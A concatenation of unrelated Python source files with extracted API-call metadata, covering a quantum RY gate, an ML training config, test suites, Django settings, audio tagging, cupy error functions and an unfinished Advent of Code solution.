{record[\'id\']}... """'], {'nl': '(False)'}), '(f"Updating record: {record[\'id\']}... ", nl=False)\n', (848, 898), False, 'from click import echo, secho\n'), ((1823, 1846), 'click.secho', 'secho', (['"""OK"""'], {'fg': '"""green"""'}), "('OK', fg='green')\n", (1828, 1846), False, 'from click import echo, secho\n'), ((2869, 2901), 'click.secho', 'secho', (['error'], {'fg': '"""red"""', 'err': '(True)'}), "(error, fg='red', err=True)\n", (2874, 2901), False, 'from click import echo, secho\n')]
|
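For clarity, update_funding_field above rewrites each funding entry roughly as follows; the award and funder values are made-up examples, not taken from a real record.

# Illustrative before/after of one funding entry (values are invented).
before = {
    "award": {"identifier": "0001", "scheme": "url", "title": "Some grant"},
    "funder": {"identifier": "00k4n6c32", "scheme": "ror", "name": "EC", "title": "European Commission"},
}
after = {
    "award": {
        "identifiers": [{"identifier": "0001", "scheme": "url"}],   # identifier/scheme folded into a list
        "title": {"en": "Some grant"},                              # plain string becomes a localized dict
    },
    "funder": {"name": "EC"},                                       # identifier, scheme and title are dropped
}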
"""This module implements the RYGate."""
from __future__ import annotations
import numpy as np
from bqskit.ir.gates.qubitgate import QubitGate
from bqskit.qis.unitary.differentiable import DifferentiableUnitary
from bqskit.qis.unitary.optimizable import LocallyOptimizableUnitary
from bqskit.qis.unitary.unitary import RealVector
from bqskit.qis.unitary.unitarymatrix import UnitaryMatrix
from bqskit.utils.cachedclass import CachedClass
class RYGate(
QubitGate,
DifferentiableUnitary,
LocallyOptimizableUnitary,
CachedClass,
):
"""
A gate representing an arbitrary rotation around the Y axis.
It is given by the following parameterized unitary:
.. math::
\\begin{pmatrix}
\\cos{\\frac{\\theta}{2}} & -\\sin{\\frac{\\theta}{2}} \\\\
\\sin{\\frac{\\theta}{2}} & \\cos{\\frac{\\theta}{2}} \\\\
\\end{pmatrix}
"""
_num_qudits = 1
_num_params = 1
_qasm_name = 'ry'
def get_unitary(self, params: RealVector = []) -> UnitaryMatrix:
"""Return the unitary for this gate, see :class:`Unitary` for more."""
self.check_parameters(params)
cos = np.cos(params[0] / 2)
sin = np.sin(params[0] / 2)
return UnitaryMatrix(
[
[cos, -sin],
[sin, cos],
],
)
def get_grad(self, params: RealVector = []) -> np.ndarray:
"""
Return the gradient for this gate.
See :class:`DifferentiableUnitary` for more info.
"""
self.check_parameters(params)
dcos = -np.sin(params[0] / 2) / 2
dsin = np.cos(params[0] / 2) / 2
return np.array(
[
[
[dcos, -dsin],
[dsin, dcos],
],
], dtype=np.complex128,
)
def optimize(self, env_matrix: np.ndarray) -> list[float]:
"""
Return the optimal parameters with respect to an environment matrix.
See :class:`LocallyOptimizableUnitary` for more info.
"""
self.check_env_matrix(env_matrix)
a = np.real(env_matrix[0, 0] + env_matrix[1, 1])
b = np.real(env_matrix[1, 0] - env_matrix[0, 1])
theta = 2 * np.arccos(a / np.sqrt(a ** 2 + b ** 2))
theta *= -1 if b > 0 else 1
return [theta]
|
[
"bqskit.qis.unitary.unitarymatrix.UnitaryMatrix",
"numpy.sin",
"numpy.array",
"numpy.real",
"numpy.cos",
"numpy.sqrt"
] |
[((1151, 1172), 'numpy.cos', 'np.cos', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1157, 1172), True, 'import numpy as np\n'), ((1187, 1208), 'numpy.sin', 'np.sin', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1193, 1208), True, 'import numpy as np\n'), ((1225, 1265), 'bqskit.qis.unitary.unitarymatrix.UnitaryMatrix', 'UnitaryMatrix', (['[[cos, -sin], [sin, cos]]'], {}), '([[cos, -sin], [sin, cos]])\n', (1238, 1265), False, 'from bqskit.qis.unitary.unitarymatrix import UnitaryMatrix\n'), ((1664, 1726), 'numpy.array', 'np.array', (['[[[dcos, -dsin], [dsin, dcos]]]'], {'dtype': 'np.complex128'}), '([[[dcos, -dsin], [dsin, dcos]]], dtype=np.complex128)\n', (1672, 1726), True, 'import numpy as np\n'), ((2122, 2166), 'numpy.real', 'np.real', (['(env_matrix[0, 0] + env_matrix[1, 1])'], {}), '(env_matrix[0, 0] + env_matrix[1, 1])\n', (2129, 2166), True, 'import numpy as np\n'), ((2179, 2223), 'numpy.real', 'np.real', (['(env_matrix[1, 0] - env_matrix[0, 1])'], {}), '(env_matrix[1, 0] - env_matrix[0, 1])\n', (2186, 2223), True, 'import numpy as np\n'), ((1622, 1643), 'numpy.cos', 'np.cos', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1628, 1643), True, 'import numpy as np\n'), ((1581, 1602), 'numpy.sin', 'np.sin', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1587, 1602), True, 'import numpy as np\n'), ((2258, 2282), 'numpy.sqrt', 'np.sqrt', (['(a ** 2 + b ** 2)'], {}), '(a ** 2 + b ** 2)\n', (2265, 2282), True, 'import numpy as np\n')]
|
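A quick numerical sanity check of the gate above: it verifies the unitary at theta = pi/2 and compares the analytic gradient against a central finite difference. It assumes bqskit is installed (RYGate can also just be the class defined above).

# Sanity check of RYGate's unitary and gradient (assumes bqskit is installed).
import numpy as np
from bqskit.ir.gates import RYGate

gate = RYGate()
theta = np.pi / 2

u = np.array(gate.get_unitary([theta]))
expected = np.array([[np.cos(theta / 2), -np.sin(theta / 2)],
                     [np.sin(theta / 2),  np.cos(theta / 2)]])
assert np.allclose(u, expected)

# The analytic gradient should match a finite-difference derivative of the unitary.
eps = 1e-6
fd = (np.array(gate.get_unitary([theta + eps])) -
      np.array(gate.get_unitary([theta - eps]))) / (2 * eps)
assert np.allclose(gate.get_grad([theta])[0], fd, atol=1e-6)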
import copy
import os.path as osp
_root_ = '../../../..'
_base_ = [osp.join(_root_, 'configs/base.py'),'../model_samplers/ar50to101v2.py']
manipulate_arch = False
_data_root_ = '/data1/Data/imagenet'
# model settings
model = dict(
type='DynamicMOCO',
queue_len=65536,
feat_dim=128,
momentum=0.999,
backbone=dict(
type='DynamicResNet',
in_channels=3,
stem_width=64,
body_depth=[4, 6, 29, 4],
body_width=[80, 160, 320, 640],
num_stages=4,
out_indices=[3],
conv_cfg=dict(type='DynConv2d'),
norm_cfg=dict(type='DynBN', requires_grad=True),
style='pytorch',
),
neck=dict(
type='DynamicNonLinearNeckV1',
in_channels=2560,
hid_channels=2048,
out_channels=128,
with_avg_pool=True),
head=dict(type='ContrastiveHead', temperature=0.2))
# dataset settings
data_source_cfg = dict(
type='ImageNet',
return_label=False,
)
# ImageNet
data_train_list = osp.join(_data_root_, 'train_10percent.txt')
data_train_root = osp.join(_data_root_, 'ILSVRC2012_img_train')
dataset_type = 'ContrastiveDataset'
img_norm_cfg = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# for other datasets, keep the same test pipeline except for the crop; too large a crop can cause out-of-memory errors
train_pipeline = [
dict(type='Resize', size=256),
dict(type='CenterCrop', size=224),
]
# prefetch
prefetch = False
if not prefetch:
train_pipeline.extend([dict(type='ToTensor'), dict(type='Normalize', **img_norm_cfg)])
data = dict(
imgs_per_gpu=16, # total 32*8=256
workers_per_gpu=2,
drop_last=True,
train=dict(
type=dataset_type,
data_source=dict(
list_file=data_train_list, root=data_train_root,
**data_source_cfg),
pipeline=train_pipeline,
prefetch=prefetch,
))
optimizer = dict(type='SGD', lr=0.12, weight_decay=0.0001, momentum=0.9)
lr_config = dict(policy='CosineAnnealing', min_lr=0.)
checkpoint_config = dict(interval=20)
# runtime settings
total_epochs = 1
work_dir = "/data2/OpenSelfSup-gaia/workdirs/moco"
model_space_path = 'hubs/flops.json'
model_sampling_rules = dict(
type='sequential',
rules=[
dict(
type='parallel',
rules=[
dict(func_str='lambda x: x[\'overhead.flops\'] >=5000000000 and x[\'overhead.flops\']<6000000000'),
]
),
dict(func_str='lambda x: x[\'data.input_shape\'] == 224'),
# sample
dict(
type='sample',
operation='random',
value=100,
mode='number',
),
# merge all groups if more than one
dict(type='merge'),
]
)
|
[
"os.path.join"
] |
[((1004, 1048), 'os.path.join', 'osp.join', (['_data_root_', '"""train_10percent.txt"""'], {}), "(_data_root_, 'train_10percent.txt')\n", (1012, 1048), True, 'import os.path as osp\n'), ((1067, 1112), 'os.path.join', 'osp.join', (['_data_root_', '"""ILSVRC2012_img_train"""'], {}), "(_data_root_, 'ILSVRC2012_img_train')\n", (1075, 1112), True, 'import os.path as osp\n'), ((67, 102), 'os.path.join', 'osp.join', (['_root_', '"""configs/base.py"""'], {}), "(_root_, 'configs/base.py')\n", (75, 102), True, 'import os.path as osp\n')]
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import matplotlib.pyplot as plt
import seaborn
from bezier import _plot_helpers
from tests.functional import test_triangle_locate
from tests.functional import utils
def make_plot(triangle_index, point_index, save_plot):
triangle = test_triangle_locate.TRIANGLES[triangle_index]
point = test_triangle_locate.POINTS[:, [point_index]]
name = f"test_triangle{triangle_index}_and_point{point_index}"
ax = triangle.plot(64)
ax.plot(
point[0, :], point[1, :], color="black", marker="o", linestyle="None"
)
ax.axis("scaled")
_plot_helpers.add_plot_boundary(ax)
if save_plot:
utils.save_fig(name)
else:
plt.title(name.replace("_", r"\_"))
plt.show()
plt.close(ax.figure)
def main():
parser = utils.get_parser()
args = parser.parse_args()
for case in test_triangle_locate.CASES:
triangle_index, point_index, _, _ = case
make_plot(triangle_index, point_index, args.save_plot)
if __name__ == "__main__":
seaborn.set() # Required in `seaborn >= 0.8`
main()
|
[
"bezier._plot_helpers.add_plot_boundary",
"tests.functional.utils.get_parser",
"matplotlib.pyplot.show",
"matplotlib.pyplot.close",
"tests.functional.utils.save_fig",
"seaborn.set"
] |
[((1107, 1142), 'bezier._plot_helpers.add_plot_boundary', '_plot_helpers.add_plot_boundary', (['ax'], {}), '(ax)\n', (1138, 1142), False, 'from bezier import _plot_helpers\n'), ((1267, 1287), 'matplotlib.pyplot.close', 'plt.close', (['ax.figure'], {}), '(ax.figure)\n', (1276, 1287), True, 'import matplotlib.pyplot as plt\n'), ((1315, 1333), 'tests.functional.utils.get_parser', 'utils.get_parser', ([], {}), '()\n', (1331, 1333), False, 'from tests.functional import utils\n'), ((1554, 1567), 'seaborn.set', 'seaborn.set', ([], {}), '()\n', (1565, 1567), False, 'import seaborn\n'), ((1169, 1189), 'tests.functional.utils.save_fig', 'utils.save_fig', (['name'], {}), '(name)\n', (1183, 1189), False, 'from tests.functional import utils\n'), ((1252, 1262), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1260, 1262), True, 'import matplotlib.pyplot as plt\n')]
|
import pytest
from goodboy.i18n import set_process_locale
from goodboy.types.numeric import Int
from goodboy.validator import Validator
schema = Int()
def test_validate():
assert Validator(schema).validate(42).is_valid
assert not Validator(schema).validate("42").is_valid
def test_validate_with_typecast():
assert Validator(schema).validate(42, typecast=True).is_valid
assert Validator(schema).validate("42", typecast=True).is_valid
@pytest.mark.parametrize(
"languages,message",
[
(["ru"], "не может быть null"),
(["en"], "cannot be null"),
],
)
def test_messages_translation(languages, message):
result = Validator(schema).validate(None)
assert result.format_errors("json", languages=languages)[0]["message"] == message
@pytest.mark.parametrize(
"languages,message",
[
(["ru"], "не может быть null"),
(["en"], "cannot be null"),
],
)
def test_messages_translation_with_default_locale(languages, message):
result = Validator(schema).validate(None)
set_process_locale(languages)
assert result.format_errors("json")[0]["message"] == message
|
[
"goodboy.types.numeric.Int",
"pytest.mark.parametrize",
"goodboy.i18n.set_process_locale",
"goodboy.validator.Validator"
] |
[((147, 152), 'goodboy.types.numeric.Int', 'Int', ([], {}), '()\n', (150, 152), False, 'from goodboy.types.numeric import Int\n'), ((458, 569), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""languages,message"""', "[(['ru'], 'не может быть null'), (['en'], 'cannot be null')]"], {}), "('languages,message', [(['ru'], 'не может быть null'\n ), (['en'], 'cannot be null')])\n", (481, 569), False, 'import pytest\n'), ((785, 896), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""languages,message"""', "[(['ru'], 'не может быть null'), (['en'], 'cannot be null')]"], {}), "('languages,message', [(['ru'], 'не может быть null'\n ), (['en'], 'cannot be null')])\n", (808, 896), False, 'import pytest\n'), ((1047, 1076), 'goodboy.i18n.set_process_locale', 'set_process_locale', (['languages'], {}), '(languages)\n', (1065, 1076), False, 'from goodboy.i18n import set_process_locale\n'), ((663, 680), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (672, 680), False, 'from goodboy.validator import Validator\n'), ((1010, 1027), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (1019, 1027), False, 'from goodboy.validator import Validator\n'), ((187, 204), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (196, 204), False, 'from goodboy.validator import Validator\n'), ((332, 349), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (341, 349), False, 'from goodboy.validator import Validator\n'), ((398, 415), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (407, 415), False, 'from goodboy.validator import Validator\n'), ((242, 259), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (251, 259), False, 'from goodboy.validator import Validator\n')]
|
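A small stand-alone sketch of the Validator/Int pair exercised by the tests above; the printed values mirror what the tests assert.

# Stand-alone sketch of the behaviour covered by the tests above.
from goodboy.types.numeric import Int
from goodboy.validator import Validator

result = Validator(Int()).validate("42", typecast=True)
print(result.is_valid)                     # True: "42" is typecast to 42

bad = Validator(Int()).validate(None)
print(bad.format_errors("json", languages=["en"])[0]["message"])   # "cannot be null"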
"""Settings that need to be set in order to run the tests."""
import logging
import os
from oscar import get_core_apps
from oscar.defaults import * # NOQA
ASIAPAY_PAYDOLLAR_URL = "ASIAPAY_URL"
ASIAPAY_MERCHANT_ID = "12345"
logging.getLogger('factory').setLevel(logging.WARN)
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
DEBUG = True
FILER_DEBUG = True
SITE_ID = 1
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
}
USE_I18N = True
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', 'English'),
('de', 'German'),
)
ROOT_URLCONF = 'asiapay.tests.urls'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(os.path.dirname(__file__), '../../static/')
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), '../../media/')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(__file__), 'test_static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(os.path.dirname(__file__), '../templates'),],
'OPTIONS': {
'debug': DEBUG,
'loaders': (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
),
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django_libs.context_processors.analytics',
'sekizai.context_processors.sekizai',
'cms.context_processors.cms_settings',
'var_project_name.context_processors.project_settings',
)
}
}]
COVERAGE_REPORT_HTML_OUTPUT_DIR = os.path.join(
os.path.dirname(__file__), 'coverage')
COVERAGE_MODULE_EXCLUDES = [
'tests$', 'settings$', 'urls$', 'locale$',
'migrations', 'fixtures', 'admin$', 'django_extensions',
]
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
] + get_core_apps()
INTERNAL_APPS = [
'asiapay',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
COVERAGE_MODULE_EXCLUDES += EXTERNAL_APPS
SECRET_KEY = 'foobar'
|
[
"os.path.dirname",
"oscar.get_core_apps",
"logging.getLogger"
] |
[((774, 799), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (789, 799), False, 'import os\n'), ((844, 869), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (859, 869), False, 'import os\n'), ((2049, 2074), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (2064, 2074), False, 'import os\n'), ((2528, 2543), 'oscar.get_core_apps', 'get_core_apps', ([], {}), '()\n', (2541, 2543), False, 'from oscar import get_core_apps\n'), ((228, 256), 'logging.getLogger', 'logging.getLogger', (['"""factory"""'], {}), "('factory')\n", (245, 256), False, 'import logging\n'), ((926, 951), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (941, 951), False, 'import os\n'), ((1079, 1104), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1094, 1104), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Muges
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
The :mod:`erika.tags` module provides functions to set and get tags for various
audio formats.
For now, the only supported format is MP3.
"""
import logging
import mutagen
from . import mp3
def set_tags(filename, episode):
"""Set the tags of the audio file of an episode.
Parameters
----------
filename : str
The audio file.
episode : :class:`Episode`
The corresponding episode.
"""
logger = logging.getLogger(__name__)
try:
audio = mutagen.File(filename)
except Exception: # pylint: disable=broad-except
logger.exception("Unable to set tags for '%s'.", filename)
return None
if isinstance(audio, mutagen.mp3.MP3):
mp3.set_tags(audio, episode)
else:
logger.warning("Unable to set tags (unsupported file format) for "
"'%s'.", filename)
def get_tags(filename):
"""Get the tags of an audio file.
Parameters
----------
filename : str
The audio file.
"""
logger = logging.getLogger(__name__)
try:
audio = mutagen.File(filename)
except Exception: # pylint: disable=broad-except
logger.exception("Unable to get tags for '%s'.", filename)
return None
if isinstance(audio, mutagen.mp3.MP3):
return mp3.get_tags(audio)
else:
logger.warning("Unable to get tags (unsupported file format) for "
"'%s'.", filename)
return None
|
[
"mutagen.File",
"logging.getLogger"
] |
[((1560, 1587), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1577, 1587), False, 'import logging\n'), ((2145, 2172), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2162, 2172), False, 'import logging\n'), ((1614, 1636), 'mutagen.File', 'mutagen.File', (['filename'], {}), '(filename)\n', (1626, 1636), False, 'import mutagen\n'), ((2199, 2221), 'mutagen.File', 'mutagen.File', (['filename'], {}), '(filename)\n', (2211, 2221), False, 'import mutagen\n')]
|
import traceback
import uuid
from types import TracebackType
from typing import List, Type
class Alarm:
""" Stores all information about a thrown exception. """
def __init__(
self,
exc_type: Type[BaseException],
exc: BaseException,
exc_traceback: TracebackType
) -> None:
"""
Create new Alarm
Args:
exc_type (:obj:`Type[BaseException]`): type of exception, that was thrown.
exc (:obj:`BaseException`): exception instance, that was thrown.
exc_traceback(:obj:`TracebackType`): traceback, that led to the exception.
"""
# store information about the exception
self.exc_type = exc_type
self.exc = exc
self.exc_traceback = exc_traceback
# generate unique error code for alert
self.error_code = str(uuid.uuid1())[0:8]
def get_exc_name(self) -> str:
""" returns the exceptions class name """
return (
self.exc['error_class']
if isinstance(self.exc, dict)
else self.exc.__class__.__name__
)
def get_exc_message(self) -> str:
""" returns the exceptions message """
return (
self.exc['error_message']
if isinstance(self.exc, dict)
else str(self.exc)
)
def get_formatted_traceback_string(self) -> str:
""" returns a formatted string version of the exceptions traceback """
# format traceback to string -> ftb
ftb = ''.join(traceback.format_tb(self.exc_traceback))
# return printable traceback
return (
'Traceback (most recent call last):\n'
f'{ftb}'
f'{self.get_exc_name()}: {self.get_exc_message()}'
)
def get_traceback_list(self) -> List[str]:
"""returns traceback in form of a list of strings."""
return traceback.format_tb(self.exc_traceback)
|
[
"uuid.uuid1",
"traceback.format_tb"
] |
[((1906, 1945), 'traceback.format_tb', 'traceback.format_tb', (['self.exc_traceback'], {}), '(self.exc_traceback)\n', (1925, 1945), False, 'import traceback\n'), ((1539, 1578), 'traceback.format_tb', 'traceback.format_tb', (['self.exc_traceback'], {}), '(self.exc_traceback)\n', (1558, 1578), False, 'import traceback\n'), ((860, 872), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (870, 872), False, 'import uuid\n')]
|
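A typical construction of the Alarm class above from inside an except block, using the tuple returned by sys.exc_info(); the failing division is only a stand-in for a real operation.

# Hypothetical usage of Alarm (the failing call is only an illustration).
import sys

try:
    1 / 0
except Exception:
    exc_type, exc, exc_tb = sys.exc_info()
    alarm = Alarm(exc_type, exc, exc_tb)
    print(alarm.error_code)                        # 8-character code derived from uuid1()
    print(alarm.get_exc_name(), alarm.get_exc_message())
    print(alarm.get_formatted_traceback_string())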
from cupy import _core
erf = _core.create_ufunc(
'cupyx_scipy_erf', ('f->f', 'd->d'),
'out0 = erf(in0)',
doc='''Error function.
.. seealso:: :meth:`scipy.special.erf`
''')
erfc = _core.create_ufunc(
'cupyx_scipy_erfc', ('f->f', 'd->d'),
'out0 = erfc(in0)',
doc='''Complementary error function.
.. seealso:: :meth:`scipy.special.erfc`
''')
erfcx = _core.create_ufunc(
'cupyx_scipy_erfcx', ('f->f', 'd->d'),
'out0 = erfcx(in0)',
doc='''Scaled complementary error function.
.. seealso:: :meth:`scipy.special.erfcx`
''')
erfinv = _core.create_ufunc(
'cupyx_scipy_erfinv', ('f->f', 'd->d'),
'out0 = erfinv(in0);',
doc='''Inverse function of error function.
.. seealso:: :meth:`scipy.special.erfinv`
.. note::
The behavior close to (and outside) the domain follows that of
SciPy v1.4.0+.
''')
erfcinv = _core.create_ufunc(
'cupyx_scipy_erfcinv', ('f->f', 'd->d'),
'out0 = erfcinv(in0);',
doc='''Inverse function of complementary error function.
.. seealso:: :meth:`scipy.special.erfcinv`
.. note::
The behavior close to (and outside) the domain follows that of
SciPy v1.4.0+.
''')
|
[
"cupy._core.create_ufunc"
] |
[((31, 191), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erf"""', "('f->f', 'd->d')", '"""out0 = erf(in0)"""'], {'doc': '"""Error function.\n\n .. seealso:: :meth:`scipy.special.erf`\n\n """'}), '(\'cupyx_scipy_erf\', (\'f->f\', \'d->d\'), \'out0 = erf(in0)\',\n doc="""Error function.\n\n .. seealso:: :meth:`scipy.special.erf`\n\n """\n )\n', (49, 191), False, 'from cupy import _core\n'), ((205, 387), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfc"""', "('f->f', 'd->d')", '"""out0 = erfc(in0)"""'], {'doc': '"""Complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfc`\n\n """'}), '(\'cupyx_scipy_erfc\', (\'f->f\', \'d->d\'), \'out0 = erfc(in0)\',\n doc=\n """Complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfc`\n\n """\n )\n', (223, 387), False, 'from cupy import _core\n'), ((397, 589), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfcx"""', "('f->f', 'd->d')", '"""out0 = erfcx(in0)"""'], {'doc': '"""Scaled complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcx`\n\n """'}), '(\'cupyx_scipy_erfcx\', (\'f->f\', \'d->d\'),\n \'out0 = erfcx(in0)\', doc=\n """Scaled complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcx`\n\n """\n )\n', (415, 589), False, 'from cupy import _core\n'), ((600, 904), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfinv"""', "('f->f', 'd->d')", '"""out0 = erfinv(in0);"""'], {'doc': '"""Inverse function of error function.\n\n .. seealso:: :meth:`scipy.special.erfinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """'}), '(\'cupyx_scipy_erfinv\', (\'f->f\', \'d->d\'),\n \'out0 = erfinv(in0);\', doc=\n """Inverse function of error function.\n\n .. seealso:: :meth:`scipy.special.erfinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """\n )\n', (618, 904), False, 'from cupy import _core\n'), ((916, 1237), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfcinv"""', "('f->f', 'd->d')", '"""out0 = erfcinv(in0);"""'], {'doc': '"""Inverse function of complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """'}), '(\'cupyx_scipy_erfcinv\', (\'f->f\', \'d->d\'),\n \'out0 = erfcinv(in0);\', doc=\n """Inverse function of complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """\n )\n', (934, 1237), False, 'from cupy import _core\n')]
|
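These ufuncs are drop-in GPU counterparts of the SciPy functions; a small cross-check against SciPy on the host is sketched below. It assumes a CUDA device plus cupy and scipy installed, and that erf/erfc are imported from cupyx.scipy.special (or defined as above).

# Cross-check the GPU ufuncs against SciPy on the host (requires a CUDA device).
import cupy as cp
import numpy as np
from scipy import special
from cupyx.scipy.special import erf, erfc

x_gpu = cp.linspace(-3, 3, 7)
x_cpu = cp.asnumpy(x_gpu)

assert np.allclose(cp.asnumpy(erf(x_gpu)), special.erf(x_cpu))
assert np.allclose(cp.asnumpy(erfc(x_gpu)), special.erfc(x_cpu))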
from fastapi.testclient import TestClient
import unittest
from RobotFrameworkService.main import app
class EndpointTesttest_s(unittest.TestCase):
def test_is_service_available(self):
with TestClient(app) as client:
response = client.get("/status")
self.assertEqual(200, response.status_code)
def test_is_robottask_startable(self):
with TestClient(app) as client:
response = client.get("/robotframework/run/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask?art=tests&description=EreichbarkeitsTestMitLogs")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask?art=tests&description=FunktionsTestMitReports")
self.assertEqual(200, response.status_code)
def test_is_robotlog_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_log/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robotreport_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_report/anotherTask")
self.assertEqual(200, response.status_code)
|
[
"fastapi.testclient.TestClient"
] |
[((203, 218), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (213, 218), False, 'from fastapi.testclient import TestClient\n'), ((384, 399), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (394, 399), False, 'from fastapi.testclient import TestClient\n'), ((599, 614), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (609, 614), False, 'from fastapi.testclient import TestClient\n'), ((826, 841), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (836, 841), False, 'from fastapi.testclient import TestClient\n'), ((1071, 1086), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1081, 1086), False, 'from fastapi.testclient import TestClient\n'), ((1360, 1375), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1370, 1375), False, 'from fastapi.testclient import TestClient\n'), ((1626, 1641), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1636, 1641), False, 'from fastapi.testclient import TestClient\n'), ((1896, 1911), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1906, 1911), False, 'from fastapi.testclient import TestClient\n')]
|
from aoc import data
import sys
from math import ceil
earliest, idString = data()
earliest = int(earliest)
ids = [x if x == 'x' else int(x) for x in idString.split(',')]
def part1(earliest, ids):
ids = [x for x in ids if x != 'x']
soonest = {ceil(earliest / id) * id:id for id in ids}
bus = soonest[min(soonest)]
wait = min(soonest) - earliest
return bus * wait
def part2(ids):
